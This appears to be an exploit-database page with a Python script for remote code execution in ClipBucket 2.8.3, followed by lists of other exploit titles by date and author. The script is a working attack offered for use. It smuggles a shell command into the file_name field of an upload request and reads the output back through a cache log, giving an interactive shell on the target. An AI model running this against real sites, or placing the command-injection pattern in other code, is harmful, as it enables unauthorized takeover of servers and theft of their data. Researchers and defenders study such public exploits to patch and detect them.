Menu

Search for hundreds of thousands of exploits

"ClipBucket 2.8.3 - Remote Code Execution"

Author

Exploit author

"Meisam Monsef"

Platform

Exploit platform

php

Release date

Exploit published date

2017-10-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE) 
# Date: 2017-10-04
# Exploit Author: Esecurity.ir 
# Vendor Homepage: https://clipbucket.com/
# Version: 2.8.3
# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
# Usage Exploit : exploit.py http://target.com/path/



import sys,os
try:
    import requests
except Exception as e:
    print 'please install module requests!'
    sys.exit()
img = 'temp.jpg'
uploadUrl = "api/file_uploader.php"
h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'}

def getShell(url):
    try:
        r = requests.get(url+'cache/1.log',headers=h)
        if r.status_code == 200:
            return r.content
        else:
            print 'Sorry site is not vulnerable '
            sys.exit()
    except Exception as e:
        print e
        sys.exit()

def exploit(url):
    while (1):
        cmd = raw_input('$')
        if cmd == '' or cmd == 'exit':
            break
        file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')}
        data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'}
        try:
            r = requests.post(url+uploadUrl, files=file_,data=data,headers=h)
            if r.status_code == 200:
                if '"success":"yes"' in r.content:
                    print getShell(url)
                else:
                    print 'Sorry site is not vulnerable '
                    break
            else:
                print 'Sorry site is not vulnerable '
                break
        except Exception as e:
            print e
            break
if not os.path.exists(img):
    print 'please create tiny image file name is ' + img
    sys.exit()

if len(sys.argv) == 2 :
    exploit(sys.argv[1])
else:
    print "Usage Exploit : exploit.py http://target.com/path/";
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-02-27 "Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Meisam Monsef"
2020-02-24 "Real Web Pentesting Tutorial Step by Step - [Persian]" webapps multiple "Meisam Monsef"
2019-02-21 "EI-Tube 3 - SQL Injection" webapps php "Meisam Monsef"
2018-10-29 "MTGAS MOGG Web Simulator Script - SQL Injection" webapps php "Meisam Monsef"
2018-05-27 "Lyrist - 'id' SQL Injection" webapps php "Meisam Monsef"
2018-05-27 "Ingenious School Management System - 'id' SQL Injection" webapps php "Meisam Monsef"
2017-10-04 "ClipBucket 2.8.3 - Remote Code Execution" webapps php "Meisam Monsef"
2017-08-02 "Entrepreneur B2B Script - 'pid' SQL Injection" webapps php "Meisam Monsef"
2016-07-19 "NewsP Free News Script 1.4.7 - User Credentials Disclosure" webapps php "Meisam Monsef"
2016-07-19 "newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure" webapps php "Meisam Monsef"
2016-07-08 "PHP Real Estate Script 3 - Arbitrary File Disclosure" webapps php "Meisam Monsef"
2016-06-23 "Alibaba Clone B2B Script - Arbitrary File Disclosure" webapps php "Meisam Monsef"
2016-05-30 "Open Source Real Estate Script 3.6.0 - SQL Injection" webapps php "Meisam Monsef"
2016-05-27 "PHP Realestate Script Script 4.9.0 - SQL Injection" webapps php "Meisam Monsef"
2016-05-04 "Alibaba Clone B2B Script - Admin Authentication Bypass" webapps php "Meisam Monsef"
2015-09-02 "SphereFTP Server 2.0 - Crash (PoC)" dos windows "Meisam Monsef"
2015-08-15 "Security IP Camera Star Vision DVR - Authentication Bypass" webapps hardware "Meisam Monsef"
2015-08-07 "PHP News Script 4.0.0 - SQL Injection" webapps php "Meisam Monsef"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.